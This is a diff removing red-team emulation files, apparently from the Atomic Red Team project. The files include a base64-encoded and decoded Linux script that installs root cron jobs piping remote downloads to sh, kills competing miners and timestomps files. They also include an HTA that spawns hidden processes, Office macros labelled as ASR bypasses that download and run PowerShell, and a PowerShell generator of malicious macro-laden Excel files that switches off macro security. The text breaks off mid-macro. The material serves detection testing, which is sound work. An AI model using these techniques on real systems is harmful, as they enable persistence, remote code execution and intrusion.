-IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
-bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
-cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
-a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
-c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
-Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
-RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
-cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
-cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
-LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
-d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
-cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
-L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
-cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
-Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
-di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
-ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
-Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
-IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
-bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
-IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
-IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
-dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
-bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
-LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
-dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
-aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
-cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
-YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
-d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
-ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
-JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
-IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
-RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
-ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
-Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
-a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
-IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
-ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
-VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
-LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
-by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
-LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
-Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
-Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
-bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
-ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
-IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
-Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
-IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
-dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
-b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
-aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
-ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
-Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
-L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
-cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
-dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
-b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
-Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
-cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
-dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
-b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
-ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
-cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
-bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
-U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
-bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
-dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
-bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
-Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
-L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
-bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
-cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
-ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
-bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
-c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
-Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
-bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
-IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
-YQpiCmM=

ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh

@@ -1,90 +0,0 @@
-#! /bin/bash
-
-function c() {
-pkill -f sourplum
-pkill -f xmrig
-pkill -f cryptonight
-pkill -f stratum
-pkill -f mixnerdx
-pkill -f minexmr
-pkill -f minerd
-pkill -f minergate
-pkill -f kworker34
-pkill -f Xbash
-
-#   Tactic: Defense Evasion
-#   Technique: T1222 - File Permission Modification
-chattr -i /tmp/kworkerds /var/tmp/kworkerds
-
-#   Tactic: Defense Evasion
-#   Technique: T1107 - File Deletion
-rm -rf /tmp/kworkerds /var/tmp/kworkerds
-
-#   Tactic: Discovery
-#   Technique: T1057 - Process Discovery
-ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
-ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
-ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
-ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
-ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
-ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
-
-#   Tactic: Discovery
-#   Technique: T1049 - System Network Connections Discovery
-netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
-netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
-netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
-netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
-netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
-netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
-netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
-netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
-
-echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
-}
-
-function b() {
-    mkdir -p /var/tmp
-
-    #   Tactic: Defense Evasion
-    #   Technique: T1222 - File Permission Modification
-    chmod 1777 /var/tmp
-
-    #   Tactic: Defense Evasion
-    #   Technique: T1036 - Masquerading
-    (curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
-    nohup /var/tmp/kworkerds >/dev/null 2>&1 &
-
-    echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
-}
-
-function a() {
-
-    #   Tactic: Defense Evasion
-    #   Technique: T1222 - File Permission Modification
-	chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
-
-    #   Tactic: Persistence
-    #   Technique: T1168 - Local Job Scheduling
-	echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
-	mkdir -p /var/spool/cron/crontabs
-	echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
-	mkdir -p /etc/cron.daily
-	(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
-
-    #   Tactic: Defense Evasion
-    #   Technique: T1222 - File Permission Modification
-    chmod 755 /etc/cron.daily/oanacroner
-
-    #   Tactic: Defense Evasion
-    #   Technique: T1099 - Timestomp
-	touch -acmr /bin/sh /etc/cron.daily/oanacroner
-    touch -acmr /bin/sh /etc/cron.d/root
-    touch -acmr /bin/sh /var/spool/cron/crontabs/root
-
-    echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
-}
-
-a
-b
-c

ARTifacts/Initial_Access/AtomicHTA.hta

@@ -1,29 +0,0 @@
-<html> 
-
-	<script language="JScript">
-			
-				// Type One
-				// Child of Explorer, cmd.exe
-				var ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}";
-				var SW = GetObject("new:" + ShellWindows).Item();
-				SW.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", 'C:\\Windows\\System32', null, 0);
-			
-				
-				// Type Two
-				// Child of wmiprvse
-				var strComputer = ".";
-				var objWMIService = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2");
-				var objStartup = objWMIService.Get("Win32_ProcessStartup");
-				var objConfig = objStartup.SpawnInstance_();
-				objConfig.ShowWindow = 0;
-				var objProcess = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2:Win32_Process");
-				var intProcessID;
-				objProcess.Create("cmd.exe", null, objConfig, intProcessID);
-				
-				// Type Three
-				// Child of mshta.exe
-				var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
-				
-				close();
-	</script>
-</html>

ARTifacts/Initial_Access/Listener.md

@@ -1,26 +0,0 @@
-# Listeners
-
-Simple methods to simulate C2 server
-
-## Python
-
-python3
-`python3 -m http.server 9000`
-
-python2
-`python  -m SimpleHTTPServer 9000`
-
-
-## PowerShell
-
-[PowerShell Webserver](https://gallery.technet.microsoft.com/scriptcenter/Powershell-Webserver-74dcf466)
-
-Start webserver with binding to http://localhost:8080/ (assuming the script is in the current directory):
-
-PowerShell
-`.\Start-Webserver.ps1`
-
-Start webserver with binding to all IP addresses of the system and port 8080 (assuming the script is in the current directory).
-Administrative rights are necessary:
-PowerShell
-`.\Start-Webserver.ps1 "http://+:8080/"`

ARTifacts/Initial_Access/Office_Macro_COM.md

@@ -1,55 +0,0 @@
-# Office Macro - COM
-
-reference: https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3
-
-
-### WordShellExecute
-
-Word.
-explorer->cmd->powershell.
-
-```
-Sub ASR_bypass_create_child_process_rule4()
-    Const ShellWindows = _
-    "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
-    Set SW = GetObject("new:" & ShellWindows).Item()
-    SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
-End Sub
-```
-### WordWmicCreateProcess
-
-Word.
-Wmiprvse.exe->cmd->powershell.
-
-```
-Sub ASR_bypass_create_child_process_rule5()
-    Const HIDDEN_WINDOW = 0
-    strComputer = "."
-    Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
-    Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
-    Set objConfig = objStartup.SpawnInstance_
-    objConfig.ShowWindow = HIDDEN_WINDOW
-    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
-    objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", Null, objConfig, intProcessID
-End Sub
-```
-
-### WordBenignWMICCreateProcess
-
-Word.
-Wmiprvse.exe->cmd->powershell.
-
-This method does not execute mimikatz.
-
-```
-Sub ASR_bypass_create_child_process_rule5()
-    Const HIDDEN_WINDOW = 0
-    strComputer = "."
-    Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
-    Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
-    Set objConfig = objStartup.SpawnInstance_
-    objConfig.ShowWindow = HIDDEN_WINDOW
-    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
-    objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')", Null, objConfig, intProcessID
-End Sub
-```

ARTifacts/Initial_Access/Zipped_Malware.md

@@ -1,9 +0,0 @@
-# Zipped Malware
-
-A common method actors use to deliver is through zip attachments in email.
-
-## ZIP + VBS Example
-
-Take the following [qbot chain reaction](https://github.com/redcanaryco/atomic-red-team/blob/master/ARTifacts/Chain_Reactions/qbot_infection_reaction.vbs) and compress (zip) the vbs file to be used for delivery.
-
-Simulate other file types by zipping and deliver to the receiving device. 

ARTifacts/Initial_Access/generate-macro.ps1

@@ -1,560 +0,0 @@
-#Adopted and Originally Coded by Matt Nelson (@enigma0x3)
-#Reference: https://github.com/enigma0x3/Generate-Macro/blob/master/Generate-Macro.ps1
- <#
-    .SYNOPSIS
-
-        Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method
-
-    .DESCRIPTION
-
-        This script will generate malicious Microsoft Excel Documents that contain VBA macros.
-        The script will display a menu of different attacks, all with different ASR Bypass methods. Once an attack is chosen.
-
-When naming the document, don't include a file extension.
-
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-
-    .Attack Types
-
-        All 7 instances represent different ASR Bypasses based on research performed by great folks within the industry. All macros were absorbed from https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3.
-
-    Additional references:
-
-        - https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
-        - https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
-        - https://www.darkoperator.com/blog/2017/11/8/windows-defender-exploit-guard-asr-obfuscated-script-rule
-        - https://posts.specterops.io/the-emet-attack-surface-reduction-replacement-in-windows-10-rs3-the-good-the-bad-and-the-ugly-34d5a253f3df
-        - https://oddvar.moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/
-
-    .EXAMPLE
-
-        PS> ./Generate-Macro.ps1
-        Enter the name of the document (Do not include a file extension): FinancialData
-
-        --------Select Attack---------
-        1. Chain Reaction Download and execute with Excel.
-        2. Chain Reaction Download and execute with Excel, wmiprvse
-        3. Chain Reaction Download and execute with Excel, wmiprvse benign
-        4. Chain Reaction Download and execute with Excel Shell
-        5. Chain Reaction Download and execute with Excel ShellBrowserWindow
-        6. Chain Reaction Download and execute with Excel WshShell
-        7. Chain Reaction Download and execute with Excel and POST C2.
-        8. Chain Reaction Download and execute with Excel and GET C2.
-        ------------------------------
-
-        Saved to file C:\Users\Malware\Desktop\FinancialData.xls
-        PS>
-
-#>
-
-$global:defLoc = "$env:userprofile\Desktop"
-$global:Name = Read-Host "Enter the name of the document (Do not include a file extension)"
-$global:Name = $global:Name + ".xls"
-$global:FullName = "$global:defLoc\$global:Name"
-
-
-function Excel-Shell {
-<#
-    .SYNOPSIS
-      Standard macro execution.
-    .DESCRIPTION
-      Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
-#>
-#create macro
-
-$Code = @"
-Sub Auto_Open()
-    Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
-End Sub
-"@
-
-#Create excel document
-$Excel01 = New-Object -ComObject "Excel.Application"
-$ExcelVersion = $Excel01.Version
-
-#Disable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
-
-$Excel01.DisplayAlerts = $false
-$Excel01.DisplayAlerts = "wdAlertsNone"
-$Excel01.Visible = $false
-$Workbook01 = $Excel01.Workbooks.Add(1)
-$Worksheet01 = $Workbook01.WorkSheets.Item(1)
-
-$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
-$ExcelModule.CodeModule.AddFromString($Code)
-
-#Save the document
-Add-Type -AssemblyName Microsoft.Office.Interop.Excel
-$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
-Write-Output "Saved to file $global:Fullname"
-
-#Cleanup
-$Excel01.Workbooks.Close()
-$Excel01.Quit()
-[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
-$Excel01 = $Null
-if (ps excel){kill -name excel}
-
-#Enable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
-
-}
-
-function Excel-Com-Wmiprvse-Benign-Trampoline {
-<#
-    .SYNOPSIS
-        Uses COM to download and execute a chain reaction via wmiprvse. This version will not execute mimikatz.
-    .DESCRIPTION
-        Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a benign chain reaction.
-#>
-
-#create macro
-
-$Code = @"
-Sub Auto_Open()
-    Const HIDDEN_WINDOW = 0
-    strComputer = "."
-    Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
-    Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
-    Set objConfig = objStartup.SpawnInstance_
-    objConfig.ShowWindow = HIDDEN_WINDOW
-    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
-    objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')", Null, objConfig, intProcessID
-End Sub
-"@
-
-#Create excel document
-$Excel01 = New-Object -ComObject "Excel.Application"
-$ExcelVersion = $Excel01.Version
-
-#Disable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
-
-$Excel01.DisplayAlerts = $false
-$Excel01.DisplayAlerts = "wdAlertsNone"
-$Excel01.Visible = $false
-$Workbook01 = $Excel01.Workbooks.Add(1)
-$Worksheet01 = $Workbook01.WorkSheets.Item(1)
-
-$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
-$ExcelModule.CodeModule.AddFromString($Code)
-
-#Save the document
-Add-Type -AssemblyName Microsoft.Office.Interop.Excel
-$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
-Write-Output "Saved to file $global:Fullname"
-
-#Cleanup
-$Excel01.Workbooks.Close()
-$Excel01.Quit()
-[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
-$Excel01 = $Null
-if (ps excel){kill -name excel}
-
-#Enable Macro Security
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
-New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
-
-}
-
-function Excel-Com-Wmiprvse-Trampoline {
-<#
-    .SYNOPSIS
-      Uses COM to download and execute chain reaction via wmiprvse.
-    .DESCRIPTION
-      Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a benign chain reaction.
-#>
-
-#create macro
-
-$Code = @"
-Sub Auto_Open()
-    Const HIDDEN_WINDOW = 0
-    strComputer = "."
-    Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
-    Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
-    Set objConfig = objStartup.SpawnInstance_
-    objConfig.ShowWindow = HIDDEN_WINDOW
-    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
